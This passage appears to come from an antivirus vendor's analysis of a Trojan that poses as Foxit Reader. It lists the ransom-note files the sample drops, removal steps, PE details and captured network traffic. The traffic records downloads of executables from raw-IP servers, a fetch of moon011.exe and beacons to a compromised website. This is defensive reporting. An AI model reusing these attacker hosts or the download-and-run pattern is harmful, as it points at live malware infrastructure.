    %Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Templates\powerpnt.ppt (454 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Templates\quattro.wb2 (430 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\MMC\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\PrintHood\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\DRM\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
    C:\totalcmd\REGISTER.RTF (421 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Templates\excel4.xls (419 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\DRM\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Favorites\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Music\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\UserData\4XCFALMJ\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Templates\winword2.doc (419 bytes)
    %Documents and Settings%\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Games\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Favorites\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\wordpfct.wpd (892 bytes)
    %Documents and Settings%\%current user%\Favorites\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\40\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
    %System%\config\SOFTWARE.LOG (4454 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\restore_files_fyiyk.html (5 bytes)
    C:\totalcmd\HISTORY.TXT (3890 bytes)
    %Documents and Settings%\Default User\Templates\winword.doc (426 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\45\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\My Playlists\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Templates\restore_files_fyiyk.txt (2 bytes)
    C:\totalcmd\SIZE!.TXT (1606 bytes)
    %Documents and Settings%\%current user%\UserData\YJM90VAL\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\SendTo\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\NetworkService\Cookies\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\All Users\Templates\restore_files_fyiyk.txt (2 bytes)
    C:\RECYCLER\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.html (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\restore_files_fyiyk.txt (2 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "ms-helper" = "%Documents and Settings%\%current user%\Application Data\vcwuwa.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "ms-helper" = "C"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: Foxit Software Inc.
Product Name: Foxit Reader
Product Version: 7.0.8.1216
Legal Copyright: Copyright (c) 2004-2014 Foxit Software Inc. All Rights Reserved.
Legal Trademarks:
Original Filename: Foxit Reader.EXE
Internal Name: Foxit Reader.exe
File Version: 7.0.8.1216
File Description: Foxit Reader 7.0, Best Reader for Everyday Use!
Comments:
Language: English (United States)

Company Name: Foxit Software Inc.Product Name: Foxit ReaderProduct Version: 7.0.8.1216Legal Copyright: Copyright (c) 2004-2014 Foxit Software Inc. All Rights Reserved.Legal Trademarks: Original Filename: Foxit Reader.EXEInternal Name: Foxit Reader.exeFile Version: 7.0.8.1216File Description: Foxit Reader 7.0, Best Reader for Everyday Use!Comments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409661162614404.56334876645dd835655ca9d458e76a939d515
.rdata6553624750250884.45346d61e42a264a1504102ce528365744c7d
.data942081238446082.492316494cc77129d27132ffab1f5adac3692
.nata110592516656324.808097dad4d85b40a7dec812f9b4ca0b2026c
.sidata118784585661445.2921220bdb60bffec29633c67c8c9d2244961
.feta126976337035845.203371af03a06d88766c117086a2885d7a566
.tls13107295120bf619eac0cdf3f68d496ea9344137e8b
.rsrc13516867840680963.161761a1467e77ce5ac22b2c90bd1f218837d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://104.200.78.119/1.php
hxxp://104.200.78.119/2.php
hxxp://104.200.78.119/3.php
hxxp://104.200.78.119/4.php
hxxp://104.200.78.119/5.php
hxxp://104.200.78.119/6.php
hxxp://104.200.78.119/7.php
hxxp://ipinfo.io/ip54.93.139.144
hxxp://mustdecor.com.br/wp-content/themes/twentythirteen/misc.php?D0B1745184D4B19325F8CA239D78E8043E59CF773AABE120FD67CB28E383F42D2D5B21A73313DC662B52BA4BB99A03658B21C0DB01C7752BEAEDBC5C0BE507C7CF30C1F5FB72777B7B7B8450978E6CF2C3FF983FADB2756AF3B5A7B8D3E8CD3B525EA22594F43E4F0E8B2A05651F90140C794C275A45A66E916A065FC3FBA9379F91432F1BAF081FE9FD060D66B1FDE418C48A871F4903EF9FD15252584C541E94F6FEFA9ED73147FD92C2F65816C3E30DA412C2E9A9255D6F4B984CF7E3FA8AE02C34F482E7A3D70D9AFE521ED91860808C876A2662E70FE4840058362281805.9.62.196
hxxp://134.90.100.78/moon011.exe

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /5.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:44 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html

0..

GET /wp-content/themes/twentythirteen/misc.php?D0B1745184D4B19325F8CA239D78E8043E59CF773AABE120FD67CB28E383F42D2D5B21A73313DC662B52BA4BB99A03658B21C0DB01C7752BEAEDBC5C0BE507C7CF30C1F5FB72777B7B7B8450978E6CF2C3FF983FADB2756AF3B5A7B8D3E8CD3B525EA22594F43E4F0E8B2A05651F90140C794C275A45A66E916A065FC3FBA9379F91432F1BAF081FE9FD060D66B1FDE418C48A871F4903EF9FD15252584C541E94F6FEFA9ED73147FD92C2F65816C3E30DA412C2E9A9255D6F4B984CF7E3FA8AE02C34F482E7A3D70D9AFE521ED91860808C876A2662E70FE484005836228180 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Host: mustdecor.com.br

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 03 Sep 2015 23:32:58 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.8

Vary: Accept-Encoding

Content-Length: 25

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

---!!!INSERTED!!!---....1HTTP/1.1 200 OK..Date: Thu, 03 Sep 2015 23:32:58 GMT..Server: Apache/2.2.22 (Ubuntu)..X-Powered-By: PHP/5.3.10-1ubuntu3.8..Vary: Accept-Encoding..Content-Length: 25..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..---!!!INSERTED!!!---....1..

GET /3.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:43 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Content-Length:

Connection: close

Content-Type: text/html

GET /4.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:44 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Content-Length:

Connection: close

Content-Type: text/html

GET /2.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:43 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Content-Length: 66298

Connection: close

Content-Type: text/html

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q..S....................................z.......z.......z.......#.......#...............................Rich............................PE..L...,..U.................0..........0.............@.................................................................................................................................................................................................UPX0.....................................PX1.....0..........................@....rsrc................2..............@......................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!.....A4 ...u....),......&.........6@....%..j8...Y...M.3.;.7..}E.t...J.M.d......{...DC1..0`...?h.:w......7MV...uF....e.s/J.F(..4.Kv.[.W....^Z3.~..n..D$..t.VT.Y!.....~..$ZX.e..J..Vn..DN.~$.u....v{^..x..SP...@$..?..$W....'P...3.Yf....f.....f.G.9V$.N.~%S.G..Y..X....o.........`.y..B...;&|.[..k.WV.W..j.X_^...,.B.. SVW.e......}..M.j.3...Q...]..P<...t2j..P.%..;..9..........H...h.LWP....k4.&.f.}..M9._.2!...E.m..n..P.9......o.[.u.^.....0..v.R<..........@.P.....E....v <..1....?3..-M....k....9,.._.[.hx...L..S.W.v3l.3....f..........(0.6..

<<< skipped >>>

GET /ip HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: ipinfo.io

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 03 Sep 2015 23:32:57 GMT

Server: nginx/1.6.2

Content-Length: 15

Connection: keep-alive

194.242.96.218.HTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 03 Sep 2015 23:32:57 GMT..Server: nginx/1.6.2..Content-Length: 15..Connection: keep-alive..194.242.96.218...

GET /6.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:44 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html

0..

GET /1.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:43 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Content-Length: 334312

Connection: close

Content-Type: text/html

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%...%...%.I./...%...6...%...%...%.". .0.%.I./...%.I./...%.I./...%...$...%.Rich..%.........PE..L...=.G@..........................................@..................................#......................................$...x....@..x5..............................................................................P............................text............................... ..`.rdata... .......0..................@..@.data....0..........................@....rsrc...x5...@...@..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

GET /7.php HTTP/1.1

Host: 104.200.78.119

HTTP/1.1 200 OK

Date: Fri, 04 Sep 2015 00:41:44 GMT

Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6

X-Powered-By: PHP/5.3.3

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html

0..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

bryehretgw.exe_1900:

explorer.exe

explorer.exe

kernel32.dll

kernel32.dll

user32.dll

user32.dll

wsock32.dll

wsock32.dll

Ws2_32.dll

Ws2_32.dll

HTTP/1.0

HTTP/1.0

/moon011.exe

/moon011.exe

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

HTTP/1.

HTTP/1.

ntdll.dll

ntdll.dll

GetProcessHeap

GetProcessHeap

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

/`.rdBa

/`.rdBa

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

USER32.dll

USER32.dll

bryehretgw.exe_1900_rwx_00400000_02328000:

explorer.exe

explorer.exe

kernel32.dll

kernel32.dll

user32.dll

user32.dll

wsock32.dll

wsock32.dll

Ws2_32.dll

Ws2_32.dll

HTTP/1.0

HTTP/1.0

/moon011.exe

/moon011.exe

HTTP/1.1

